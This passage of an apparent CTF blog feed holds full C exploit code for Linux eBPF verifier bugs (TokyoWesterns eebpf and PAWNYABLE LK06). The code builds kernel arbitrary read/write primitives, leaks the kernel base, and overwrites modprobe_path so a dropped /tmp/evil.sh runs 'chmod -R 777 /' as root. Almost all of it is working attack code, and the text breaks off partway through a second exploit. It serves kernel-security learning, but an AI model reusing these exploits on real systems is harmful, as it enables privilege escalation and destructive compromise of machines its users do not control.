          0x08),  // r1 = r1 &amp;amp; 0x08 == (.val=0, .mask=0x8; umin=0, umax=0x8)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0,
                    BPF_REG_1),  // r0 =  r0 + r1 == (umin=0x8, umax=0x8) ==
                                 // constant 8 (but, it&amp;#39;s actually 0x10)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_0,
          -0x8),  // r0 = r0 - 0x8 == constant 0 (but, it&amp;#39;s actually 0x8)
      BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),  // r7 = r0
      // From now, r7 is marked as constant 0 but it&amp;#39;s actually 0x08

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_7),  // arg4 = r7 == (actual_val=0x8; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    1),  // arg4 = 1 * arg4 == (actual_val=0x8; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          8),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x8, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x8, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s&amp;#34;, verifier_log);
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}
static uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x8),

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // map_lookup_elem(mapfd, &amp;amp;key)
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_MOV64_REG(BPF_REG_5, BPF_REG_0),           // r5 = map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0),  // r6 = *map_elem == 1

      BPF_MOV64_REG(
          BPF_REG_0,
          BPF_REG_6),  // r0 = r6 == (.val=0, .mask=0xffffffffffffffff)
      BPF_MOV64_IMM(BPF_REG_1, -1),  // r1 = 0xffffffffffffffff
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    3),  // r1 = r1 &amp;gt;&amp;gt; 3 == 0x1fffffffffffffff
      BPF_ALU64_REG(BPF_AND, BPF_REG_0,
                    BPF_REG_1),  // r0 = r0 &amp;amp; r1 == (actual_val=1; .val=0,
                                 // .mask=0x1fffffffffffffff)
      BPF_ALU64_IMM(BPF_ALSH, BPF_REG_0,
                    3),  // r0 = r0 &amp;lt;&amp;lt; 3 == (actual_val=8; .val=0,
                         // .mask=0xfffffffffffffff8;
                         // umin=0, umax=0xfffffffffffffff8)
      BPF_ALU64_IMM(
          BPF_REG_0, BPF_ADD,
          8),  // r0 = r0 + 8 == (actual_val=0x10; .val=0, .mask=0x8; umin=0x8,
               // umax=0).
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),  // r1 = r6 == [map_elem]
      BPF_ALU64_IMM(
          BPF_AND, BPF_REG_1,
          0x08),  // r1 = r1 &amp;amp; 0x08 == (.val=0, .mask=0x8; umin=0, umax=0x8)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0,
                    BPF_REG_1),  // r0 =  r0 + r1 == (umin=0x8, umax=0x8) ==
                                 // constant 8 (but, it&amp;#39;s actually 0x10)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_0,
          -0x8),  // r0 = r0 - 0x8 == constant 0 (but, it&amp;#39;s actually 0x8)
      BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),  // r7 = r0
      // From now, r7 is marked as constant 0 but it&amp;#39;s actually 0x08

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_7),  // arg4 = r7 == (actual_val=0x8; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    1),  // arg4 = 1 * arg4 == (actual_val=0x8; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          8),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x8, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x8, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s&amp;#34;, verifier_log);
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));

  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

int main() {
  mapfd = bpf_map_create(sizeof(uint64_t), 1);
  map_addr = leak_bpf_map_addr(0);
  printf(&amp;#34;[+] map_addr = 0x%016lx\n&amp;#34;, map_addr);

  uint64_t kernel_base = aar64(map_addr) - BPF_MAP_OPS_OFFSET;
  printf(&amp;#34;[+] kernel_base: 0x%016lx\n&amp;#34;, kernel_base);

  const char* new_modprobe = &amp;#34;/tmp/evil.sh&amp;#34;;
  const size_t new_modprobe_len = strlen(new_modprobe);
  printf(&amp;#34;[*] Overwrite modprobe to %s\n&amp;#34;, new_modprobe);
  for (size_t i = 0; i &amp;lt; new_modprobe_len; i += 8) {
    aaw64(kernel_base + MODPROBE_OFFSET + i, *(uint64_t*)(new_modprobe + i));
  }
  {
    int fd = open(&amp;#34;/proc/sys/kernel/modprobe&amp;#34;, O_RDONLY);
    if (fd &amp;lt; 0) {
      fatal(&amp;#34;open(/proc/sys/kernel/modprobe)&amp;#34;);
    }

    char modprobe[0x100];
    read(fd, modprobe, sizeof(modprobe));
    if (strncmp(modprobe, new_modprobe, new_modprobe_len)) {
      printf(&amp;#34;[*] new modprobe: %s\n&amp;#34;, modprobe);
      puts(&amp;#34;[-] Failed to overwrite modprobe&amp;#34;);
      return -1;
    }
    puts(&amp;#34;[+] Successfully overwritten modprobe&amp;#34;);
  }

  puts(&amp;#34;[+] Get root&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;#!/bin/sh\nchmod -R 777 /&amp;#39; &amp;gt; /tmp/evil.sh&amp;#34;);
  system(&amp;#34;chmod +x /tmp/evil.sh&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;\xde\xad\xbe\xef&amp;#39; &amp;gt; /tmp/pwn&amp;#34;);
  system(&amp;#34;chmod +x /tmp/pwn&amp;#34;);
  system(&amp;#34;/tmp/pwn&amp;#34;);

  close(mapfd);
  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h2 id=&#34;reference&#34;&gt;Reference&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/TokyoWesterns/2020/eebpf&#34;&gt;https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/TokyoWesterns/2020/eebpf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content>
    </item>
    
    <item>
      <title>PAWNYABLE LK06: Brahman</title>
      <link>/posts/kernel/pawnyable/pawnyable_lk06/</link>
      <pubDate>Wed, 22 Jan 2025 12:31:57 +0000</pubDate>
      
      <guid>/posts/kernel/pawnyable/pawnyable_lk06/</guid>
      <description>&lt;hr&gt;
&lt;h2 id=&#34;lk06-brahman&#34;&gt;LK06: Brahman&lt;/h2&gt;
&lt;h3 id=&#34;exploit-using-adjust_ptr_min_max_vals&#34;&gt;Exploit using adjust_ptr_min_max_vals&lt;/h3&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;149628537&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;149628537&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;exploit.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handler the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &amp;amp;val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&amp;amp;val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  write(socks[1], &amp;#34;Hello&amp;#34;, 5);

  bpf_map_lookup(mapfd, 0, &amp;amp;val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
